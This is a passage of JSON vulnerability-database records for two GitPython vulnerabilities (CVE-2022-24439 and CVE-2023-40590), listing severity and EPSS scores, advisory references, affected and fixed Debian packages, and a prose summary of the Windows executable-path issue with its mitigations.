epss","scoring_elements":"0.98628","published_at":"2026-04-11T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98624","published_at":"2026-04-08T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98625","published_at":"2026-04-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24439"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24439","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24439"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/blob/bec61576ae75803bc4e60d8de7a629c194313d1c/git/repo/base.py%23L1249","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/blob/bec61576ae75803bc4e60d8de7a629c194313d1c/git/repo/base.py%23L1249"},{"reference_url":"https://github.com/gitpython-developers/GitPython/blob/bec61576ae75803bc4e60d8de7a629c194313d1c/git/repo/base.py#L1249","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/blob/bec61576ae75803bc4e60d8de7a629c194313d1c/git/repo/base.py#L1249"},{"reference_url":"https://github.com/gitpython-developers/GitPython/commit/2625ed9fc074091c531c27ffcba7902771130261","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/commit/2625ed9fc074091c531c27ffcba7902771130261"},{"reference_url":"https://github.com/gitpython-developers/GitPython/issues/1515","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/issues/1515"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.30","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.30"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2022-42992.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2022-42992.yaml"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2023/07/msg00024.html","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2023/07/msg00024.html"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2024/10/msg00030.html","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2024/10/msg00030.html"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IKMVYKLWX62UEYKAN64RUZMOIAMZM5JN","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IKMVYKLWX62UEYKAN64RUZMOIAMZM5JN"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SJHN3QUXPJIMM6SULIR3PR34UFWRAE7X","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SJHN3QUXPJIMM6SULIR3PR34UFWRAE7X"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IKMVYKLWX62UEYKAN64RUZMOIAMZM5JN","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IKMVYKLWX62UEYKAN64RUZMOIAMZM5JN"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IKMVYKLWX62UEYKAN64RUZMOIAMZM5JN/","reference_id":"","reference_type":"","scores":[],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IKMVYKLWX62UEYKAN64RUZMOIAMZM5JN/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJHN3QUXPJIMM6SULIR3PR34UFWRAE7X","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJHN3QUXPJIMM6SULIR3PR34UFWRAE7X"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJHN3QUXPJIMM6SULIR3PR34UFWRAE7X/","reference_id":"","reference_type":"","scores":[],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJHN3QUXPJIMM6SULIR3PR34UFWRAE7X/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24439","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24439"},{"reference_url":"https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1027163","reference_id":"1027163","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1027163"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2151583","reference_id":"2151583","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2151583"},{"reference_url":"https://github.com/advisories/GHSA-hcpj-qp55-gfph","reference_id":"GHSA-hcpj-qp55-gfph","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hcpj-qp55-gfph"},{"reference_url":"https://security.gentoo.org/glsa/202311-01","reference_id":"GLSA-202311-01","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.gentoo.org/glsa/202311-01"},{"reference_url":"https://access.redhat.com/errata/RHSA-2023:5931","reference_id":"RHSA-2023:5931","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2023:5931"},{"reference_url":"https://usn.ubuntu.com/5968-1/","reference_id":"USN-5968-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/5968-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/936506?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936507?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1%2Bdeb11u1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936505?format=json","purl":"pkg:deb/debian/python-git@3.1.30-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.30-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936504?format=json","purl":"pkg:deb/debian/python-git@3.1.30-1%2Bdeb12u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.30-1%252Bdeb12u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936509?format=json","purl":"pkg:deb/debian/python-git@3.1.44-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.44-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936508?format=json","purl":"pkg:deb/debian/python-git@3.1.46-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.46-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2022-24439","GHSA-hcpj-qp55-gfph","PYSEC-2022-42992"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dtjt-b2am-9fab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10957?format=json","vulnerability_id":"VCID-qf8a-r6sz-qqf7","summary":"GitPython is a python library used to interact with Git repositories. When resolving a program, Python/Windows look for the current working directory, and after that the PATH environment. GitPython defaults to use the `git` command, if a user runs GitPython from a repo has a `git.exe` or `git` executable, that program will be run instead of the one in the user's `PATH`. This is more of a problem on how Python interacts with Windows systems, Linux and any other OS aren't affected by this. But probably people using GitPython usually run it from the CWD of a repo. An attacker can trick a user to download a repository with a malicious `git` executable, if the user runs/imports GitPython from that directory, it allows the attacker to run any arbitrary commands. There is no fix currently available for windows users, however there are a few mitigations. 1: Default to an absolute path for the git program on Windows, like `C:\\\\Program Files\\\\Git\\\\cmd\\\\git.EXE` (default git path installation). 2: Require users to set the `GIT_PYTHON_GIT_EXECUTABLE` environment variable on Windows systems. 3: Make this problem prominent in the documentation and advise users to never run GitPython from an untrusted repo, or set the `GIT_PYTHON_GIT_EXECUTABLE` env var to an absolute path. 4: Resolve the executable manually by only looking into the `PATH` environment variable.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-40590.json","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-40590.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-40590","reference_id":"","reference_type":"","scores":[{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.59013","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58942","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58914","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58959","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58901","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58892","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58906","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.5889","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58907","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58929","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58924","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58891","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58928","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58911","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58905","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58853","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58885","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00371","scoring_system":"epss","scoring_elements":"0.58863","published_at":"2026-04-02T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-40590"},{"reference_url":"https://docs.python.org/3/library/subprocess.html#popen-constructor","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-02T14:04:30Z/"}],"url":"https://docs.python.org/3/library/subprocess.html#popen-constructor"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/commit/8b75434e2c8a082cdeb4971cc6f0ee2bafec45bc","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/commit/8b75434e2c8a082cdeb4971cc6f0ee2bafec45bc"},{"reference_url":"https://github.com/gitpython-developers/GitPython/issues/1635","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/issues/1635"},{"reference_url":"https://github.com/gitpython-developers/GitPython/pull/1636","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/pull/1636"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.33","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.33"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wfm5-v35h-vwf4","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-02T14:04:30Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wfm5-v35h-vwf4"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-161.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-161.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2235871","reference_id":"2235871","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2235871"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-40590","reference_id":"CVE-2023-40590","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-40590"},{"reference_url":"https://github.com/advisories/GHSA-wfm5-v35h-vwf4","reference_id":"GHSA-wfm5-v35h-vwf4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wfm5-v35h-vwf4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/936511?format=json","purl":"pkg:deb/debian/python-git@0?distro=trixie","is_vulnerable":fa